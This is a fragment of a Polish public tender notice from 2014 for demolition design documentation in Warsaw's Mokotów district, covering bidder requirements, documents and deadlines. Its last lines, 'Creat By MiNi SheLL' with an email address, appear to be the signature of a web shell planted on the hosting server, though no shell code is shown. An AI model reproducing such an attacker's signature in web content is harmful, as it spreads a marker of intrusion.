Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w ofercie wykazu osób (wg wzoru stanowiącego załącznik nr 5 do formularza oferty ). W ww wykazie należy podać informacje na temat kwalifikacji zawodowych tych osób, ich uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia,  a także zakresu wykonywanych przez nich czynności i podstawie do dysponowania nimi. 
Wykonawca wybrany do podpisania umowy musi przedłożyć do umowy uprawnienia osób, które będą wykonywały zamówienie i ich aktualne zaświadczenia o wpisaniu na listę członków właściwej Izby Samorządu Zawodowego. 
 
3.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonaniu zamówienia, w formie oryginałów. 
Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w szczególności:
-zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację wskazującą, który konkretny zasób jest udostępniany. W przypadku udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia zdolności finansowych/  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

-sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia.

-charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem. 

-zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,


Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.3A. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  
4.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
4.1.pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           4.2. inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1Wykonawca musi wykazać, że posiada opłaconą polisę, a w przypadku jej braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia potwierdzającą posiadanie ww ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.
Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia potwierdzającej posiadanie ww ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta oraz dokumenty i oświadczenia, wymagane w postępowaniu .
	1.1. Wykonawca musi dołączyć do oferty w terminie wskazanym w pkt. 15. 
                  specyfikacji istotnych warunków zamówienia i w formie określonej w  specyfikacji:
 1.1.1. wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia, 
1.1.2. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.5.1.2. specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,  
1.1.3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.6.3. specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
1.1.4. informację o części - częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,  
1.1.5. informację podmiotów i o podmiotach, które będą brały udział w realizacji  części zamówienia, na zasobach, których polega wykonawca na zasadach określonych w pkt. 8.2. siwz, 
             1.1.6. oświadczenie o zapoznaniu się i akceptacji założeń projektowych i 
                          kosztorysowych na wykonanie dokumentacji projektowej i kosztorysowej  
                          rozbiórki budynku mieszkalnego znajdującego się na posesji przy ul. 
                          Rakowieckiej 2C w Warszawie na terenie Dzielnicy Mokotów, na załączniku nr 
                          1 wg wzoru załączonego do wzoru formularza oferty, 
1.1.7. zobowiązanie do wniesienia zabezpieczenia należytego wykonania umowy na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty, 
  1.1.8.	oświadczenie na załączniku nr 6 do oferty wg wzoru załączonego do wzoru formularza oferty, iż po upływie terminu ważności będzie odnawiać ubezpieczenie na kwotę nie niższą niż równowartość 30.000 złotych polskich na czas obejmujący wykonanie przedmiotu zamówienia oraz, że przedłoży Zamawiającemu do wglądu oryginał odnowionego ubezpieczenia w terminie 7 dni kalendarzowych od daty jego zawarcia, jednakże nie później niż w dniu podpisania umowy w przypadku gdy dotychczasowe ubezpieczenie wygasa po terminie składania ofert częściowych, 
           1.1.9. informacji określonej w pkt. 16.1.1. specyfikacji w przypadku zastosowania  przez wykonawcę innej niż (23 %) stawki podatku od towarów i usług, obowiązującej w dacie składania ofert.

1.2.   W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w pkt. 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
1.2.1. oświadczenie na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty, że spełnia warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych, 
1.2.2. wykaz głównych usług, wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów na rzecz których usługi zostały wykonane, potwierdzający spełnienie warunku określonego w pkt. 8.1.1. specyfikacji na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty, 
1.2.3. wykaz osób które będą uczestniczyć w wykonaniu zamówienia, potwierdzający spełnienie warunku określonego w pkt. 8.1.2. specyfikacji na załączniku nr 5 do oferty wg wzoru załączonego do wzoru formularza oferty,
1.2.4. opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 
co najmniej 30.000 PLN.
  1.2.5. dowody dotyczące usług, określające czy usługi te, (wykazane przez Wykonawcę w załączniku nr 4 do oferty, zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia) zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa w zdaniu poprzednim są: 
              a)poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
 b)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o których mowa w pkt. a),
 W przypadku gdy Wykonawca wskazuje w wykazie usług, usługi, które wcześniej zostały wykonane na rzecz Zamawiającego, nie ma obowiązku przedkładania ww dowodów.
1.2.6. W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            1.2.6.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            1.2.6.2.  pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           1.2.6.3. inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2. SIWZ.
                       
1.3. 	W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
1.3.1. oświadczenie na załączniku nr 7 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
1.3.2. aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
1.3.3.  Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt. 8 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w pkt. 8.2. SIWZ, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest załączyć dokumenty wymienione w pkt. 9.2.6. i 9.3 i lub 9.7. SIWZ, odnoszące się do tych podmiotów.
1.3.A. W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 2 pkt. 5  ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą :
              1.3.A.1. listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp lub informację o braku przynależności do grupy kapitałowej - wzór druku stanowi załącznik nr 8 do oferty wg wzoru załączonego do wzoru formularza oferty.

1.4. W celu potwierdzenia że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego  w SIWZ; 
           Zamawiający nie wymaga złożenia dokumentów na potwierdzenie, że oferowane usługi  odpowiadają wymaganiom określonym przez Zamawiającego. Za spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt 9.2.1. SIWZ i wypełnienie formularza oferty.

1.5. Oferta wspólna
1.5.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) pod warunkiem, że żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy Pzp, a taka oferta spełniać będzie następujące wymagania: 
1.5.1.1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia 
Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;
1.5.1.2. Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. Umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a)  postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)  ustanowionego Pełnomocnika oraz zakres jego umocowania;
1.5.1.3.Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
1.5.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę  wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy pzp. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. i 9.3.A. siwz podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.2.4. i/lub 9.7.1., 9.7.2. siwz  dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
1.5.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. siwz)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. siwz podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;

1.5.2.Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie 
z Pełnomocnikiem, którego adres należy wpisać w formularzu oferty.

1.5.3.Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.

1.6. 	W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać będą za wykonanie zamówienia.

1.7. Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.
         1.7.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.3.2.  specyfikacji - składa dokument lub dokumenty wystawione 
w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
              Dokumenty, o których mowa w pkt. 9.7.1. SIWZ powinny być wystawione nie   wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
          1.7.2. 	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 9.7.1., zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy,  złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt. 9.7.1 SIWZ odnoszące się do wymaganych terminów ważności poszczególnych dokumentów stosuje się odpowiednio. jw.
         1.7.3. W przypadku Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej wszystkie wykazywane przez nich w załącznikach do oferty częściowej i dokumentach wartości i kwoty w EURO będą przeliczane przez Zamawiającego w/g średniego kursu NBP na dzień upublicznienia postępowania.

1.8. W PRZYPADKU, GDY WYKONAWCA W MIEJSCE KTÓREGOŚ Z DOKUMENTÓW, 
O KTÓRYCH MOWA W PKT 9.2.4., 9.2.6., 9.3.2.., 9.7.1.., 9.7.2., SPECYFIKACJI DOSTARCZY JEGO KOPIĘ, KOPIA TA MUSI BYĆ POŚWIADCZONA ZA ZGODNOŚĆ Z ORYGINAŁEM zgodnie z zapisem pkt. 14.6.4 specyfikacji istotnych warunków zamówienia przy czym w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z zapisem pkt. 14.6.5. siwz  Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów np., gdy złożone  kopie dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich prawdziwości.

1.9. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. Dokumenty 
i oświadczenia sporządzone w języku obcym, są składane wraz z tłumaczeniem  na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy o 
            ile  warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których
            nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne
            dla Zamawiającego. Zamawiający dopuszcza możliwość zmiany umowy w
            szczególności w następujących przypadkach:
a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia umowy          wraz ze skutkami takiej zmiany regulacji prawnych;
b) ograniczenia środków budżetowych na realizację Przedmiotu niniejszej umowy;
c) zmiany zakresu rzeczowego i finansowego;
             d)  zmiany osób uczestniczących w realizacji Przedmiotu niniejszej umowy;
        e) zmiany wymaganej sprawozdawczości i rozliczeń kosztów wykonania Przedmiotu 
            umowy;
            f) zmiany Podwykonawców w sytuacji, gdy z przyczyn, których nie można było 
                 przewidzieć w chwili zawarcia umowy, koniecznym będzie dla prawidłowego 
                 wykonania umowy posłużenie się przez Wykonawcę nowymi Podwykonawcami, 
                 którzy będą realizowali część lub cały zakres powierzony uprzednio innym 
                 Podwykonawcom. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy 
                 podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych
                 w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, 
                 o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać 
                 zamawiającemu, iż proponowany inny podwykonawca lub wykonawca 
                 samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie 
                 postępowania o udzielenie zamówienia;
 2. Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod rygorem
       nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2014 godzina 10:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com